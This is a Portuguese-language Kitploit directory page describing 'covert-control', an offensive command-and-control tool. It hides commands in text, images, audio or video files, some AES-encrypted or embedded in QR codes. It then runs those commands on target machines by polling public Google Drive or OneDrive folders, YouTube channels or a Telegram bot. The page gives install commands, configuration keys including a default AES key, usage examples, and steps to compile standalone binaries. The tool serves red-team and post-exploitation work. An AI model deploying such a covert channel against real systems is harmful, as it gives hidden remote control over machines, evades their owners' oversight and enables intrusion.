Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
covert-control — Google Drive, OneDrive e Youtube como canais ocultos - Controle sistemas remotamente enviando arquivos para o Google Drive, OneDrive, Youtube ou Telegram | Kitploit
Ferramentas/GitHubGitHub/ricardojoserf/covert-control
Ferramentas de Criptografia/DescriptografiaExfiltração de DadosPós-ExploraçãoComando e ControleRed Teaming
GitHubricardojoserf/covert-control

covert-control

Google Drive, OneDrive e Youtube como canais ocultos - Controle sistemas remotamente enviando arquivos para o Google Drive, OneDrive, Youtube ou Telegram

Ver Repositório
718há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

covert-control

Controle sistemas remotamente carregando arquivos no Google Drive, OneDrive, Youtube ou Telegram usando Python para criar os arquivos e os listeners. Permite criar arquivos de texto, imagens, áudio ou vídeos, com os comandos em texto claro ou criptografados usando AES.

  • covert-googledrive.py - Controle sistemas carregando arquivos em uma pasta pública do Google Drive.

  • covert-onedrive.py - Controle sistemas carregando arquivos em uma pasta pública do OneDrive.

  • covert-youtube.py - Controle sistemas carregando vídeos no Youtube (atualizado a partir do covert-tube).

  • covert-telegram.py - Controle sistemas com um bot do Telegram.

Criar arquivos para carregar

Você pode encontrar arquivos de exemplo na pasta test_files ou criar novos com o generate_file.py:

root@kitploit:~
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
  • -t (--type) [Obrigatório]: Tipos de arquivo: "text", "image", "audio" ou "video".

  • -o (--outputfile) [Opcional]: Arquivo de saída.

  • -c (--command) [Opcional]: Comando a executar.

  • -e (--encrypted) [Opcional]: Adicione esta flag para criptografar o comando com AES.

Exemplos:

root@kitploit:~
python3 generate_file.py -t text  -c "whoami" -o text.txt
python3 generate_file.py -t text  -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e

Configuração

Valores de configuração comuns:

  • data_type (Opcional. Padrão: "text"):

Valores de configuração específicos:

  • googledrive_folder: URL da pasta pública do Google Drive a monitorar (para covert-googledrive.py).

  • onedrive_folder: URL da pasta pública do OneDrive a monitorar (para covert-onedrive.py).

  • youtube_channel_id: ID do canal do Youtube a monitorar. Você pode obtê-lo aqui (para covert-youtube.py).

  • youtube_api_key: Obtenha uma chave de API criando uma aplicação e gerando a chave aqui (para covert-youtube.py).

  • telegram_token: Token do bot, crie-o usando o BotFather. Escreva "/newbot", depois envie um nome para o bot (por exemplo, "botname") e um nome de usuário para o bot terminando em "-bot" (por exemplo, "somethingrandombot") (para covert-telegram.py).

  • telegram_username: Especifique um nome de usuário do Telegram para que execute apenas comandos recebidos deste usuário (sem "@").


Google Drive

Permite executar comandos carregando arquivos de texto, imagens, áudio e vídeos, não criptografados ou criptografados com AES. O argumento de entrada opcional é a URL da pasta pública, que também pode ser configurada no config.py:

root@kitploit:~
python3 covert-googledrive.py [FOLDER_URL]

O listener verificará a pasta do Google Drive a cada 300 segundos por padrão (pode ser atualizado no config.py). Neste caso, um vídeo, "video.avi", é carregado com o comando no QR do vídeo:

img1

Após encontrar um novo arquivo carregado na pasta, ele é baixado, processado e os comandos são executados:

img2


Onedrive

Permite executar comandos carregando arquivos de texto, imagens, áudio e vídeos, não criptografados ou criptografados com AES. O argumento de entrada opcional é a URL da pasta pública, que também pode ser configurada no config.py:

root@kitploit:~
python3 covert-onedrive.py [FOLDER_URL]

O listener verificará a pasta do OneDrive a cada 300 segundos por padrão (isso pode ser atualizado no config.py). Neste caso, um áudio, "audio_encrypted.wav", é carregado com o comando criptografado com AES:

img3

Após encontrar um novo arquivo carregado na pasta, ele é baixado, processado e os comandos são executados:

img4

NOTA: Isso só funcionará se você não excluir nenhum arquivo na pasta; se o fizer, deverá criar uma nova. Seria possível implementar para funcionar mesmo após excluir arquivos, mas seria necessário criar muitas requisições e seria menos discreto.


Youtube

Permite executar comandos carregando vídeos, não criptografados ou criptografados com AES. Os argumentos de entrada opcionais são o ID do canal do Youtube a monitorar e a chave da API, que também podem ser configurados no config.py:

root@kitploit:~
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]

O listener verificará o canal do Youtube a cada 300 segundos por padrão (isso pode ser atualizado no config.py). Primeiro, o vídeo é carregado:

img5

Após encontrar um novo vídeo no canal, ele é baixado, processado e os comandos são executados:

img6


Telegram

Controle sistemas remotamente com um bot do Telegram. Esta opção não permite carregar arquivos, mas é possível enviar os comandos em texto claro ("/cmd") ou criptografados com AES ("/encrypted"). O primeiro argumento de entrada opcional é o token do bot, que também pode ser configurado no config.py; o segundo é usado para configurar um único usuário do Telegram que pode enviar comandos ao bot (sem "@"):

root@kitploit:~
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]

O listener verificará os comandos no chat e mostrará a saída:

root@kitploit:~
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

img7


Instalação

root@kitploit:~
sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/

Criando binários independentes

root@kitploit:~
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
Baixar ferramenta
data_typeTipo de arquivoCriptografadoVálido paraExtensão
textArquivo de textoNãoGoogle Drive, OneDrive.txt
text_encryptedArquivo de textoSimGoogle Drive, OneDrive.txt
imageImagemNãoGoogle Drive, OneDrive.png
image_encryptedImagemSimGoogle Drive, OneDrive.png
audioÁudioNãoGoogle Drive, OneDrive.wav
audio_encryptedÁudioSimGoogle Drive, OneDrive.wav
videoVídeoNãoGoogle Drive, OneDrive, Youtube.avi
video_encryptedVídeoSimGoogle Drive, OneDrive, Youtube.avi
  • delay_seconds (Opcional. Padrão: 300): Segundos entre verificações de novos arquivos carregados na pasta do Google Drive ou OneDrive ou novos vídeos no canal do Youtube.

  • aes_key (Opcional. Padrão: "covert-control21"): Chave para criptografia AES.

  • debug (Opcional. Padrão: True): Imprimir mensagens e timestamps no listener ou não.